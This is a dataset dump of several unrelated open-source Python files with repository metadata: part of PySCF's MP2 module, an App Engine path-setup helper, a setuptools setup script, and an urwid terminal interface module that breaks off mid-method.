                mol = self.mol.set_geom_(mol_or_geom, inplace=False)
            self.reset(mol)
            mf_scanner = self._scf
            mf_scanner(mol)
            # Reuse the converged SCF orbitals for the MP2 step.
            self.mo_coeff = mf_scanner.mo_coeff
            self.mo_occ = mf_scanner.mo_occ
            self.kernel(**kwargs)
            return self.e_tot
    return MP2_Scanner(mp)
class MP2(lib.StreamObject):
    '''restricted MP2 with canonical HF and non-canonical HF reference
    Attributes:
        verbose : int
            Print level. Default value equals to :class:`Mole.verbose`
        max_memory : float or int
            Allowed memory in MB. Default value equals to :class:`Mole.max_memory`
        conv_tol : float
            For non-canonical MP2, converge threshold for MP2
            correlation energy. Default value is 1e-7.
        conv_tol_normt : float
            For non-canonical MP2, converge threshold for
            norm(t2). Default value is 1e-5.
        max_cycle : int
            For non-canonical MP2, max number of MP2
            iterations. Default value is 50.
        diis_space : int
            For non-canonical MP2, DIIS space size in MP2
            iterations. Default is 6.
        level_shift : float
            A shift on virtual orbital energies to stablize the MP2 iterations.
        frozen : int or list
            If integer is given, the inner-most orbitals are excluded from MP2
            amplitudes. Given the orbital indices (0-based) in a list, both
            occupied and virtual orbitals can be frozen in MP2 calculation.
            >>> mol = gto.M(atom = 'H 0 0 0; F 0 0 1.1', basis = 'ccpvdz')
            >>> mf = scf.RHF(mol).run()
            >>> # freeze 2 core orbitals
            >>> pt = mp.MP2(mf).set(frozen = 2).run()
            >>> # freeze 2 core orbitals and 3 high lying unoccupied orbitals
            >>> pt.set(frozen = [0,1,16,17,18]).run()
    Saved results
        e_corr : float
            MP2 correlation correction
        e_tot : float
            Total MP2 energy (HF + correlation)
        t2 :
            T amplitudes t2[i,j,a,b] (i,j in occ, a,b in virt)
    '''
    # Use CCSD default settings for the moment
    max_cycle = getattr(__config__, 'cc_ccsd_CCSD_max_cycle', 50)
    conv_tol = getattr(__config__, 'cc_ccsd_CCSD_conv_tol', 1e-7)
    conv_tol_normt = getattr(__config__, 'cc_ccsd_CCSD_conv_tol_normt', 1e-5)
    def __init__(self, mf, frozen=None, mo_coeff=None, mo_occ=None):
        # mo_coeff/mo_occ default to the SCF orbitals; passing them
        # explicitly enables MP2 on top of modified orbitals.
        if mo_coeff is None: mo_coeff = mf.mo_coeff
        if mo_occ is None: mo_occ = mf.mo_occ
        self.mol = mf.mol
        self._scf = mf
        self.verbose = self.mol.verbose
        self.stdout = self.mol.stdout
        self.max_memory = mf.max_memory
        self.frozen = frozen
# For iterative MP2
        self.level_shift = 0
##################################################
# don't modify the following attributes, they are not input options
        self.mo_coeff = mo_coeff
        self.mo_occ = mo_occ
        self._nocc = None
        self._nmo = None
        self.e_corr = None
        self.e_hf = None
        self.t2 = None
        self._keys = set(self.__dict__.keys())
    # nocc/nmo are computed from mo_occ and frozen unless explicitly set.
    @property
    def nocc(self):
        return self.get_nocc()
    @nocc.setter
    def nocc(self, n):
        self._nocc = n
    @property
    def nmo(self):
        return self.get_nmo()
    @nmo.setter
    def nmo(self, n):
        self._nmo = n
    def reset(self, mol=None):
        # Rebind to a new molecule (used by geometry scanners).
        if mol is not None:
            self.mol = mol
        self._scf.reset(mol)
        return self
    get_nocc = get_nocc
    get_nmo = get_nmo
    get_frozen_mask = get_frozen_mask
    def dump_flags(self, verbose=None):
        log = logger.new_logger(self, verbose)
        log.info('')
        log.info('******** %s ********', self.__class__)
        log.info('nocc = %s, nmo = %s', self.nocc, self.nmo)
        if self.frozen is not None:
            log.info('frozen orbitals %s', self.frozen)
        log.info('max_memory %d MB (current use %d MB)',
                 self.max_memory, lib.current_memory()[0])
        return self
    @property
    def emp2(self):
        # Backward-compatible alias for the correlation energy.
        return self.e_corr
    @property
    def e_tot(self):
        return (self.e_hf or self._scf.e_tot) + self.e_corr
    def kernel(self, mo_energy=None, mo_coeff=None, eris=None, with_t2=WITH_T2):
        '''
        Args:
            with_t2 : bool
                Whether to generate and hold t2 amplitudes in memory.
        '''
        if self.verbose >= logger.WARN:
            self.check_sanity()
        self.dump_flags()
        if eris is None:
            eris = self.ao2mo(self.mo_coeff)
        self.e_hf = getattr(eris, 'e_hf', None)
        if self.e_hf is None:
            self.e_hf = self._scf.e_tot
        # Converged SCF -> closed-form MP2; otherwise solve iteratively.
        if self._scf.converged:
            self.e_corr, self.t2 = self.init_amps(mo_energy, mo_coeff, eris, with_t2)
        else:
            self.converged, self.e_corr, self.t2 = _iterative_kernel(self, eris)
        self._finalize()
        return self.e_corr, self.t2
    def _finalize(self):
        '''Hook for dumping results and clearing up the object.'''
        logger.note(self, 'E(%s) = %.15g E_corr = %.15g',
                    self.__class__.__name__, self.e_tot, self.e_corr)
        return self
    def ao2mo(self, mo_coeff=None):
        return _make_eris(self, mo_coeff, verbose=self.verbose)
    make_rdm1 = make_rdm1
    make_rdm2 = make_rdm2
    as_scanner = as_scanner
    def density_fit(self, auxbasis=None, with_df=None):
        # Switch to the density-fitted MP2 implementation.
        from pyscf.mp import dfmp2
        mymp = dfmp2.DFMP2(self._scf, self.frozen, self.mo_coeff, self.mo_occ)
        if with_df is not None:
            mymp.with_df = with_df
        if mymp.with_df.auxbasis != auxbasis:
            # Copy before mutating so the shared with_df object is untouched.
            mymp.with_df = copy.copy(mymp.with_df)
            mymp.with_df.auxbasis = auxbasis
        return mymp
    def nuc_grad_method(self):
        from pyscf.grad import mp2
        return mp2.Gradients(self)
    # For non-canonical MP2
    energy = energy
    update_amps = update_amps
    def init_amps(self, mo_energy=None, mo_coeff=None, eris=None, with_t2=WITH_T2):
        return kernel(self, mo_energy, mo_coeff, eris, with_t2)
# Alias: the restricted implementation is the default MP2.
RMP2 = MP2
from pyscf import scf
# Attach MP2 as a method on RHF so mf.MP2() works; ROHF is not supported.
scf.hf.RHF.MP2 = lib.class_as_method(MP2)
scf.rohf.ROHF.MP2 = None
def _mo_energy_without_core(mp, mo_energy):
    '''Orbital energies restricted to the active (non-frozen) space.'''
    active = get_frozen_mask(mp)
    return mo_energy[active]
def _mo_without_core(mp, mo):
    '''MO coefficient columns restricted to the active (non-frozen) space.'''
    active = get_frozen_mask(mp)
    return mo[:, active]
def _mem_usage(nocc, nvir):
nmo = nocc + nvir
basic = ((nocc*nvir)**2 + nocc*nvir**2*2)*8 / 1e6
incore = nocc*nvir*nmo**2/2*8 / 1e6 + basic
outcore = basic
return incore, outcore, basic
#TODO: Merge this _ChemistsERIs class with ccsd._ChemistsERIs class
class _ChemistsERIs:
    '''Container for the MO-basis quantities needed by MP2: the (ov|ov)
    integrals, the Fock matrix, orbital energies and the HF energy.'''
    def __init__(self, mol=None):
        self.mol = mol
        self.mo_coeff = None    # active-space MO coefficients
        self.nocc = None        # number of active occupied orbitals
        self.fock = None        # Fock matrix in the active MO basis
        self.e_hf = None        # HF total energy for the given orbitals
        self.orbspin = None
        self.ovov = None        # (ov|ov) integrals (array or HDF5 dataset)
    def _common_init_(self, mp, mo_coeff=None):
        if mo_coeff is None:
            mo_coeff = mp.mo_coeff
        if mo_coeff is None:
            raise RuntimeError('mo_coeff, mo_energy are not initialized.\n'
                               'You may need to call mf.kernel() to generate them.')
        self.mo_coeff = _mo_without_core(mp, mo_coeff)
        self.mol = mp.mol
        if mo_coeff is mp._scf.mo_coeff and mp._scf.converged:
            # The canonical MP2 from a converged SCF result. Rebuilding fock
            # and e_hf can be skipped
            self.mo_energy = _mo_energy_without_core(mp, mp._scf.mo_energy)
            self.fock = numpy.diag(self.mo_energy)
            self.e_hf = mp._scf.e_tot
        else:
            # Non-canonical orbitals: rebuild the Fock matrix and HF energy
            # from the density of the supplied orbitals.
            dm = mp._scf.make_rdm1(mo_coeff, mp.mo_occ)
            vhf = mp._scf.get_veff(mp.mol, dm)
            fockao = mp._scf.get_fock(vhf=vhf, dm=dm)
            self.fock = self.mo_coeff.conj().T.dot(fockao).dot(self.mo_coeff)
            self.e_hf = mp._scf.energy_tot(dm=dm, vhf=vhf)
            # Diagonal of the (generally non-diagonal) Fock matrix.
            self.mo_energy = self.fock.diagonal().real
        return self
def _make_eris(mp, mo_coeff=None, ao2mofn=None, verbose=None):
    '''Build the (ov|ov) MO integrals, choosing the incore, density-fitted
    or out-of-core transformation path based on available memory and the
    mean-field object.'''
    log = logger.new_logger(mp, verbose)
    time0 = (time.clock(), time.time())
    eris = _ChemistsERIs()
    eris._common_init_(mp, mo_coeff)
    mo_coeff = eris.mo_coeff
    nocc = mp.nocc
    nmo = mp.nmo
    nvir = nmo - nocc
    mem_incore, mem_outcore, mem_basic = _mem_usage(nocc, nvir)
    mem_now = lib.current_memory()[0]
    max_memory = max(0, mp.max_memory - mem_now)
    if max_memory < mem_basic:
        log.warn('Not enough memory for integral transformation. '
                 'Available mem %s MB, required mem %s MB',
                 max_memory, mem_basic)
    # Fortran-ordered occupied/virtual coefficient blocks for ao2mo.
    co = numpy.asarray(mo_coeff[:,:nocc], order='F')
    cv = numpy.asarray(mo_coeff[:,nocc:], order='F')
    if (mp.mol.incore_anyway or
        (mp._scf._eri is not None and mem_incore < max_memory)):
        log.debug('transform (ia|jb) incore')
        if callable(ao2mofn):
            eris.ovov = ao2mofn((co,cv,co,cv)).reshape(nocc*nvir,nocc*nvir)
        else:
            eris.ovov = ao2mo.general(mp._scf._eri, (co,cv,co,cv))
    elif getattr(mp._scf, 'with_df', None):
        # To handle the PBC or custom 2-electron with 3-index tensor.
        # Call dfmp2.MP2 for efficient DF-MP2 implementation.
        log.warn('DF-HF is found. (ia|jb) is computed based on the DF '
                 '3-tensor integrals.\n'
                 'You can switch to dfmp2.MP2 for better performance')
        log.debug('transform (ia|jb) with_df')
        eris.ovov = mp._scf.with_df.ao2mo((co,cv,co,cv))
    else:
        log.debug('transform (ia|jb) outcore')
        eris.feri = lib.H5TmpFile()
        #ao2mo.outcore.general(mp.mol, (co,cv,co,cv), eris.feri,
        #                      max_memory=max_memory, verbose=log)
        #eris.ovov = eris.feri['eri_mo']
        eris.ovov = _ao2mo_ovov(mp, co, cv, eris.feri, max(2000, max_memory), log)
    time1 = log.timer('Integral transformation', *time0)
    return eris
#
# the MO integral for MP2 is (ov|ov). This is the efficient integral
# (ij|kl) => (ij|ol) => (ol|ij) => (ol|oj) => (ol|ov) => (ov|ov)
# or => (ij|ol) => (oj|ol) => (oj|ov) => (ov|ov)
#
def _ao2mo_ovov(mp, orbo, orbv, feri, max_memory=2000, verbose=None):
    '''Out-of-core two-pass AO->MO transformation producing the (ov|ov)
    integrals as an HDF5 dataset in *feri*.

    Pass 1 contracts the AO integrals with the occupied orbitals, writing
    half-transformed (oo|shell-pair) blocks to a temporary file.  Pass 2
    reloads those blocks and contracts with the virtual orbitals.  Double
    buffering with lib.call_in_background overlaps I/O and computation.
    '''
    time0 = (time.clock(), time.time())
    log = logger.new_logger(mp, verbose)
    mol = mp.mol
    int2e = mol._add_suffix('int2e')
    ao2mopt = _ao2mo.AO2MOpt(mol, int2e, 'CVHFnr_schwarz_cond',
                             'CVHFsetnr_direct_scf')
    nao, nocc = orbo.shape
    nvir = orbv.shape[1]
    nbas = mol.nbas
    assert(nvir <= nao)
    ao_loc = mol.ao_loc_nr()
    # Shell-pair block size limited by the available memory.
    dmax = max(4, min(nao/3, numpy.sqrt(max_memory*.95e6/8/(nao+nocc)**2)))
    sh_ranges = ao2mo.outcore.balance_partition(ao_loc, dmax)
    dmax = max(x[2] for x in sh_ranges)
    eribuf = numpy.empty((nao,dmax,dmax,nao))
    ftmp = lib.H5TmpFile()
    log.debug('max_memory %s MB (dmax = %s) required disk space %g MB',
              max_memory, dmax, nocc**2*(nao*(nao+dmax)/2+nvir**2)*8/1e6)
    buf_i = numpy.empty((nocc*dmax**2*nao))
    buf_li = numpy.empty((nocc**2*dmax**2))
    buf1 = numpy.empty_like(buf_li)
    fint = gto.moleintor.getints4c
    jk_blk_slices = []
    count = 0
    time1 = time0
    with lib.call_in_background(ftmp.__setitem__) as save:
        # Only the lower triangle of shell-pair blocks is computed; the
        # missing upper triangle is reconstructed by transposition in load().
        for ip, (ish0, ish1, ni) in enumerate(sh_ranges):
            for jsh0, jsh1, nj in sh_ranges[:ip+1]:
                i0, i1 = ao_loc[ish0], ao_loc[ish1]
                j0, j1 = ao_loc[jsh0], ao_loc[jsh1]
                jk_blk_slices.append((i0,i1,j0,j1))
                eri = fint(int2e, mol._atm, mol._bas, mol._env,
                           shls_slice=(0,nbas,ish0,ish1, jsh0,jsh1,0,nbas),
                           aosym='s1', ao_loc=ao_loc, cintopt=ao2mopt._cintopt,
                           out=eribuf)
                tmp_i = numpy.ndarray((nocc,(i1-i0)*(j1-j0)*nao), buffer=buf_i)
                tmp_li = numpy.ndarray((nocc,nocc*(i1-i0)*(j1-j0)), buffer=buf_li)
                lib.ddot(orbo.T, eri.reshape(nao,(i1-i0)*(j1-j0)*nao), c=tmp_i)
                lib.ddot(orbo.T, tmp_i.reshape(nocc*(i1-i0)*(j1-j0),nao).T, c=tmp_li)
                tmp_li = tmp_li.reshape(nocc,nocc,(i1-i0),(j1-j0))
                save(str(count), tmp_li.transpose(1,0,2,3))
                # Swap buffers so the async writer can keep using the old one.
                buf_li, buf1 = buf1, buf_li
                count += 1
                time1 = log.timer_debug1('partial ao2mo [%d:%d,%d:%d]' %
                                         (ish0,ish1,jsh0,jsh1), *time1)
    time1 = time0 = log.timer('mp2 ao2mo_ovov pass1', *time0)
    # Release pass-1 work buffers before allocating the pass-2 buffers.
    eri = eribuf = tmp_i = tmp_li = buf_i = buf_li = buf1 = None
    h5dat = feri.create_dataset('ovov', (nocc*nvir,nocc*nvir), 'f8',
                                chunks=(nvir,nvir))
    occblk = int(min(nocc, max(4, 250/nocc, max_memory*.9e6/8/(nao**2*nocc)/5)))
    def load(i0, eri):
        # Gather the half-transformed integrals for occupied slice [i0,i1).
        if i0 < nocc:
            i1 = min(i0+occblk, nocc)
            for k, (p0,p1,q0,q1) in enumerate(jk_blk_slices):
                eri[:i1-i0,:,p0:p1,q0:q1] = ftmp[str(k)][i0:i1]
                if p0 != q0:
                    dat = numpy.asarray(ftmp[str(k)][:,i0:i1])
                    eri[:i1-i0,:,q0:q1,p0:p1] = dat.transpose(1,0,3,2)
    def save(i0, i1, dat):
        # Write finished (ov|ov) rows for occupied indices [i0,i1).
        for i in range(i0, i1):
            h5dat[i*nvir:(i+1)*nvir] = dat[i-i0].reshape(nvir,nocc*nvir)
    orbv = numpy.asarray(orbv, order='F')
    buf_prefecth = numpy.empty((occblk,nocc,nao,nao))
    buf = numpy.empty_like(buf_prefecth)
    bufw = numpy.empty((occblk*nocc,nvir**2))
    bufw1 = numpy.empty_like(bufw)
    with lib.call_in_background(load) as prefetch:
        with lib.call_in_background(save) as bsave:
            load(0, buf_prefecth)
            for i0, i1 in lib.prange(0, nocc, occblk):
                # Double buffering: compute on `buf` while the next slice is
                # prefetched into `buf_prefecth` and results are saved async.
                buf, buf_prefecth = buf_prefecth, buf
                prefetch(i1, buf_prefecth)
                eri = buf[:i1-i0].reshape((i1-i0)*nocc,nao,nao)
                dat = _ao2mo.nr_e2(eri, orbv, (0,nvir,0,nvir), 's1', 's1', out=bufw)
                bsave(i0, i1, dat.reshape(i1-i0,nocc,nvir,nvir).transpose(0,2,1,3))
                bufw, bufw1 = bufw1, bufw
                time1 = log.timer_debug1('pass2 ao2mo [%d:%d]' % (i0,i1), *time1)
    time0 = log.timer('mp2 ao2mo_ovov pass2', *time0)
    return h5dat
# WITH_T2 was only needed as a default-argument value above.
del(WITH_T2)
if __name__ == '__main__':
    # Smoke test: water/cc-pVDZ, printing deviations from reference energies
    # (each printed value should be ~0).
    from pyscf import scf
    from pyscf import gto
    mol = gto.Mole()
    mol.atom = [
        [8 , (0. , 0. , 0.)],
        [1 , (0. , -0.757 , 0.587)],
        [1 , (0. , 0.757 , 0.587)]]
    mol.basis = 'cc-pvdz'
    mol.build()
    mf = scf.RHF(mol).run()
    pt = MP2(mf)
    emp2, t2 = pt.kernel()
    print(emp2 - -0.204019967288338)
    # Force the out-of-core integral transformation path.
    pt.max_memory = 1
    emp2, t2 = pt.kernel()
    print(emp2 - -0.204019967288338)
    pt = MP2(scf.density_fit(mf, 'weigend'))
    print(pt.kernel()[0] - -0.204254500454)
    # Non-converged SCF exercises the iterative (non-canonical) solver.
    mf = scf.RHF(mol).run(max_cycle=1)
    pt = MP2(mf)
    print(pt.kernel()[0] - -0.204479914961218)
|
gkc1000/pyscf
|
pyscf/mp/mp2.py
|
Python
|
apache-2.0
| 27,343
|
[
"PySCF"
] |
810f671986c21ae5a3f406adf2b051591d464a9fcf0d6c3680627823ae5deb87
|
# -*- coding: utf-8 -*-
import os, sys
COMMON_DIR = os.path.abspath(os.path.dirname(os.path.dirname(__file__)))
PROJECT_DIR = os.path.dirname(COMMON_DIR)
ZIP_PACKAGES_DIRS = (os.path.join(PROJECT_DIR, 'zip-packages'),
os.path.join(COMMON_DIR, 'zip-packages'))
# Overrides for os.environ
env_ext = {'DJANGO_SETTINGS_MODULE': 'settings'}
def setup_env(manage_py_env=False):
    """Configures app engine environment for command-line apps.

    Locates the Google App Engine SDK (local copy, well-known install
    locations, or PATH), adds it and its bundled libraries to sys.path,
    then initializes the project via setup_project() and patch_all().
    Exits the process if the SDK cannot be found.
    """
    # Try to import the appengine code from the system path.
    try:
        from google.appengine.api import apiproxy_stub_map
    except ImportError:
        # NOTE: the bound-but-unused "except ImportError, e" form was
        # Python-2-only syntax; the bare form works on Python 2 and 3.
        # Drop any half-imported google modules before retrying below.
        for k in [k for k in sys.modules if k.startswith('google')]:
            del sys.modules[k]
        # Not on the system path. Build a list of alternative paths where it
        # may be. First look within the project for a local copy, then look for
        # where the Mac OS SDK installs it.
        paths = [os.path.join(COMMON_DIR, '.google_appengine'),
                 '/usr/local/google_appengine',
                 '/Applications/GoogleAppEngineLauncher.app/Contents/Resources/GoogleAppEngine-default.bundle/Contents/Resources/google_appengine']
        for path in os.environ.get('PATH', '').replace(';', ':').split(':'):
            path = path.rstrip(os.sep)
            if path.endswith('google_appengine'):
                paths.append(path)
        if os.name in ('nt', 'dos'):
            prefix = '%(PROGRAMFILES)s' % os.environ
            paths.append(prefix + r'\Google\google_appengine')
        # Loop through all possible paths and look for the SDK dir.
        SDK_PATH = None
        for sdk_path in paths:
            sdk_path = os.path.realpath(sdk_path)
            if os.path.exists(sdk_path):
                SDK_PATH = sdk_path
                break
        if SDK_PATH is None:
            # The SDK could not be found in any known location.
            sys.stderr.write('The Google App Engine SDK could not be found!\n'
                             'Visit http://code.google.com/p/app-engine-patch/'
                             ' for installation instructions.\n')
            sys.exit(1)
        # Add the SDK and the libraries within it to the system path.
        EXTRA_PATHS = [SDK_PATH]
        lib = os.path.join(SDK_PATH, 'lib')
        # Automatically add all packages in the SDK's lib folder:
        for dir in os.listdir(lib):
            path = os.path.join(lib, dir)
            # Package can be under 'lib/<pkg>/<pkg>/' or 'lib/<pkg>/lib/<pkg>/'
            detect = (os.path.join(path, dir), os.path.join(path, 'lib', dir))
            for path in detect:
                if os.path.isdir(path):
                    EXTRA_PATHS.append(os.path.dirname(path))
                    break
        sys.path = EXTRA_PATHS + sys.path
        from google.appengine.api import apiproxy_stub_map
    # Add this folder to sys.path
    sys.path = [os.path.abspath(os.path.dirname(__file__))] + sys.path
    setup_project()
    from appenginepatcher.patch import patch_all
    patch_all()
    if not manage_py_env:
        return
    # sys.stderr.write replaces the Python-2-only "print >> sys.stderr".
    sys.stderr.write('Running on app-engine-patch 1.0.2.2\n')
def setup_project():
    """Set up project environment variables and extend sys.path with the
    project, common and appenginepatcher/zip-package folders (idempotent)."""
    from appenginepatcher import on_production_server
    if on_production_server:
        # This fixes a pwd import bug for os.path.expanduser()
        global env_ext
        env_ext['HOME'] = PROJECT_DIR
    os.environ.update(env_ext)
    # Add the two parent folders and appenginepatcher's lib folder to sys.path.
    # The current folder has to be added in main.py or setup_env(). This
    # suggests a folder structure where you separate reusable code from project
    # code:
    # project -> common -> appenginepatch
    # You can put a custom Django version into the "common" folder, for example.
    EXTRA_PATHS = [
        PROJECT_DIR,
        COMMON_DIR,
    ]
    this_folder = os.path.abspath(os.path.dirname(__file__))
    EXTRA_PATHS.append(os.path.join(this_folder, 'appenginepatcher', 'lib'))
    # We support zipped packages in the common and project folders.
    # The files must be in the packages folder.
    for packages_dir in ZIP_PACKAGES_DIRS:
        if os.path.isdir(packages_dir):
            for zip_package in os.listdir(packages_dir):
                EXTRA_PATHS.append(os.path.join(packages_dir, zip_package))
    # App Engine causes main.py to be reloaded if an exception gets raised
    # on the first request of a main.py instance, so don't call setup_project()
    # multiple times. We ensure this indirectly by checking if we've already
    # modified sys.path.
    if len(sys.path) < len(EXTRA_PATHS) or \
            sys.path[:len(EXTRA_PATHS)] != EXTRA_PATHS:
        # Remove the standard version of Django
        for k in [k for k in sys.modules if k.startswith('django')]:
            del sys.modules[k]
        sys.path = EXTRA_PATHS + sys.path
|
gogogo/gogogo-hk
|
common/appenginepatch/aecmd.py
|
Python
|
agpl-3.0
| 4,878
|
[
"VisIt"
] |
0be37498774de88152bf6fa41b8e396c7c932c405bdb5069fd87b77dd3331994
|
"""A setuptools based setup module.
See:
https://packaging.python.org/en/latest/distributing.html
https://github.com/pypa/sampleproject
"""
# Always prefer setuptools over distutils
from setuptools import setup, find_packages
# To use a consistent encoding
from codecs import open
from os import path
here = path.abspath(path.dirname(__file__))
# Get the long description from the README file
with open(path.join(here, 'README.md'), encoding='utf-8') as f:
long_description = f.read()
# Get the testing requirements from testing-requirements.txt
with open(path.join(here, 'testing-requirements.txt')) as f:
test_reqs = f.read().splitlines()
setup(
name='acceptanceutils',
# Versions should comply with PEP440. For a discussion on single-sourcing
# the version across setup.py and the project code, see
# https://packaging.python.org/en/latest/single_source_version.html
version='0.1.2',
description='Generic acceptance testing utils.',
long_description=long_description,
# The project's main homepage.
url='https://github.com/Brian-Williams/acceptanceutils',
# Author details
author='Brian Williams',
author_email='briancmwilliams@gmail.com',
# Choose your license
license='MIT',
# See https://pypi.python.org/pypi?%3Aaction=list_classifiers
classifiers=[
# How mature is this project? Common values are
# 3 - Alpha
# 4 - Beta
# 5 - Production/Stable
'Development Status :: 3 - Alpha',
# Indicate who your project is intended for
'Intended Audience :: Developers',
'Topic :: Software Development :: Build Tools',
# Pick your license as you wish (should match "license" above)
'License :: OSI Approved :: MIT License',
# Specify the Python versions you support here. In particular, ensure
# that you indicate whether you support Python 2, Python 3 or both.
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: Implementation :: PyPy',
],
# What does your project relate to?
keywords='testing acceptance',
# You can just specify the packages manually here if your project is
# simple. Or you can use find_packages().
packages=find_packages(),
# Alternatively, if you want to distribute just a my_module.py, uncomment
# this:
# py_modules=["my_module"],
# List run-time dependencies here. These will be installed by pip when
# your project is installed. For an analysis of "install_requires" vs pip's
# requirements files see:
# https://packaging.python.org/en/latest/requirements.html
install_requires=[],
# List additional groups of dependencies here (e.g. development
# dependencies). You can install these using the following syntax,
# for example:
# $ pip install -e .[dev,test]
extras_require={
'test': list(test_reqs),
},
# If there are data files included in your packages that need to be
# installed, specify them here. If using Python 2.6 or less, then these
# have to be included in MANIFEST.in as well.
# package_data={
# 'sample': ['package_data.dat'],
# },
# Although 'package_data' is the preferred approach, in some case you may
# need to place data files outside of your packages. See:
# http://docs.python.org/3.4/distutils/setupscript.html#installing-additional-files # noqa
# In this case, 'data_file' will be installed into '<sys.prefix>/my_data'
# data_files=[('my_data', ['data/data_file'])],
# To provide executable scripts, use entry points in preference to the
# "scripts" keyword. Entry points provide cross-platform support and allow
# pip to create the appropriate form of executable for the target platform.
# entry_points={
# 'console_scripts': [
# 'sample=sample:main',
# ],
# },
)
|
Brian-Williams/acceptanceutils
|
setup.py
|
Python
|
mit
| 4,079
|
[
"Brian"
] |
922821e6c48ecbbbb4b908dab021ffa2832a56bcfbc046dab48c6ab04f587e94
|
"""Urwid framework shamelessly lifted from:
https://github.com/izderadicka/xmpp-tester/blob/master/commander.py
To be fair, I cleaned it up and added comments, so it's not all gank. ;)"""
# pylint: disable=too-many-instance-attributes, too-few-public-methods, invalid-name, too-many-arguments
from collections import deque
import threading
import urwid
class UnknownCommand(Exception):
    """Raised when a typed command has no matching do_* handler."""
    def __init__(self, cmd):
        message = 'Unknown command: %s' % cmd
        Exception.__init__(self, message)
class Interaction(object):
    """Routes command lines typed at the Terminal.

    Subclasses add commands by defining do_<name>(*args) methods; quit and
    help commands are built in.
    """
    def __init__(self):
        """Set up basic help and quit capabilites."""
        # IRC-style command words, minus the leading slash. :P
        self._quit_cmd = ['quit', 'q']
        self._help_cmd = ['help', '?']
    def __call__(self, line):
        words = line.split()
        cmd, args = words[0].lower(), words[1:]
        if cmd in self._quit_cmd:
            return Terminal.Exit
        if cmd in self._help_cmd:
            topic = args[0] if args else None
            return self.help(topic)
        handler = getattr(self, 'do_' + cmd, None)
        if handler is None:
            raise UnknownCommand(cmd)
        return handler(*args)
    def help(self, cmd=None):
        """Socorro!  Return help for *cmd*, or a generic summary."""
        def std_help():
            """Rudimentary help text."""
            qc = '|'.join(self._quit_cmd)
            hc = '|'.join(self._help_cmd)
            names = sorted(n[3:] for n in dir(self)
                           if n.startswith('do_') and len(n) > 3)
            summary = 'Type [%s] command_name to get more help.\n' % hc
            summary += 'Type [%s] to quit.\n' % qc
            summary += 'Available commands: %s' % (' '.join(names))
            return summary
        if not cmd:
            return std_help()
        try:
            fn = getattr(self, 'do_' + cmd)
        except AttributeError:
            return std_help()
        return fn.__doc__ or 'No documentation available for %s' % cmd
class FocusMixin(object):
    """Mixin that fires a widget's _got_focus callback on mouse focus."""
    def mouse_event(self, size, event, button, x, y, focus):
        """Invoke _got_focus (if set) then delegate to the next class in MRO."""
        callback = getattr(self, '_got_focus', None)
        if focus and callback:
            callback()
        return super(FocusMixin, self).mouse_event(size, event, button, x, y, focus)
class ListView(FocusMixin, urwid.ListBox):
    """This is how lines of text actually get displayed."""
    def __init__(self, model, got_focus, max_size=None):
        # model: a urwid.SimpleListWalker backing the box;
        # max_size: optional cap on retained lines (oldest dropped first).
        urwid.ListBox.__init__(self, model)
        self._got_focus = got_focus
        self.max_size = max_size
        # Serializes add() calls arriving from worker threads.
        self._lock = threading.Lock()
    def add(self, line):
        """Add (display) a line of text."""
        with self._lock: # pylint: disable=not-context-manager
            # Auto-scroll only if the view was already at the bottom.
            was_on_end = self.get_focus()[1] == len(self.body)-1
            if self.max_size and len(self.body) > self.max_size:
                del self.body[0]
            self.body.append(urwid.Text(line))
            last = len(self.body) - 1
            if was_on_end:
                self.set_focus(last, 'above')
class Input(FocusMixin, urwid.Edit):
    """Single-line command input with a scrollable history (up/down arrows)."""
    signals = ['line_entered']
    def __init__(self, got_focus=None):
        """Provide a scrollable command history (up/down arrows)."""
        urwid.Edit.__init__(self)
        self.history = deque(maxlen=100)
        self._history_index = -1
        self._got_focus = got_focus
    def keypress(self, size, key):
        """Deal with *single* keypresses.

        'enter' emits the line_entered signal, 'up'/'down' walk the history,
        and anything else is delegated to urwid.Edit.  Fix: the original
        used separate ``if`` statements with a dangling ``else``, so handled
        keys ('enter', 'up') also fell through into the final ``else`` and
        were passed to Edit.keypress a second time; the ``elif`` chain below
        handles each key exactly once.
        """
        if key == 'enter':
            line = self.edit_text.strip()
            if line:
                urwid.emit_signal(self, 'line_entered', line)
                self.history.append(line)
                # Point one past the newest entry so 'up' recalls it first.
                self._history_index = len(self.history)
                self.edit_text = u''
        elif key == 'up':
            self._history_index -= 1
            if self._history_index < 0:
                self._history_index = 0
            else:
                self.edit_text = self.history[self._history_index]
        elif key == 'down':
            self._history_index += 1
            if self._history_index >= len(self.history):
                # Walked past the newest entry: clear the input line.
                self._history_index = len(self.history)
                self.edit_text = u''
            else:
                self.edit_text = self.history[self._history_index]
        else:
            urwid.Edit.keypress(self, size, key)
class Terminal(urwid.Frame):
    """Simple terminal UI: a scrolling output body, a title header and a
    command input footer wired to an optional command handler."""
    # colours
    PALLETE = [('reversed', urwid.BLACK, urwid.LIGHT_GRAY),
               ('normal', urwid.LIGHT_GRAY, urwid.BLACK),
               ('error', urwid.LIGHT_RED, urwid.BLACK),
               ('green', urwid.DARK_GREEN, urwid.BLACK),
               ('blue', urwid.LIGHT_BLUE, urwid.BLACK),
               ('magenta', urwid.DARK_MAGENTA, urwid.BLACK)]
    class Exit(object):
        """Sentinel returned by a command handler to stop the main loop."""
        pass
    def __init__(self, title='', cap='', cmd=None, max_size=100):
        """init.

        cmd: callable invoked with each entered line (e.g. an Interaction);
        max_size: maximum number of output lines retained.
        """
        self.header = urwid.Text(title)
        self.model = urwid.SimpleListWalker([])
        self.body = ListView(self.model, lambda: self._update_focus(False), max_size=max_size)
        self.input = Input(lambda: self._update_focus(True))
        footer = urwid.Pile(
            [urwid.AttrMap(urwid.Text(cap), 'reversed'),
             urwid.AttrMap(self.input, 'normal')]
        )
        urwid.Frame.__init__(
            self,
            urwid.AttrWrap(self.body, 'normal'),
            urwid.AttrWrap(self.header, 'reversed'),
            footer
        )
        # Start with keyboard focus on the input line.
        self.set_focus_path(['footer', 1])
        self._focus = True
        urwid.connect_signal(
            self.input,
            'line_entered',
            self.on_line_entered
        )
        self._cmd = cmd
        self._output_styles = [s[0] for s in self.PALLETE]
        self.eloop = None
    def loop(self, handle_mouse=False):
        """Run the urwid main loop (blocks); remembers the UI thread."""
        self.eloop = urwid.MainLoop(self, self.PALLETE, handle_mouse=handle_mouse)
        self._eloop_thread = threading.current_thread() # pylint: disable=attribute-defined-outside-init
        self.eloop.run()
    def on_line_entered(self, line):
        """Dispatch an entered line to the command handler (if any)."""
        if self._cmd:
            try:
                res = self._cmd(line)
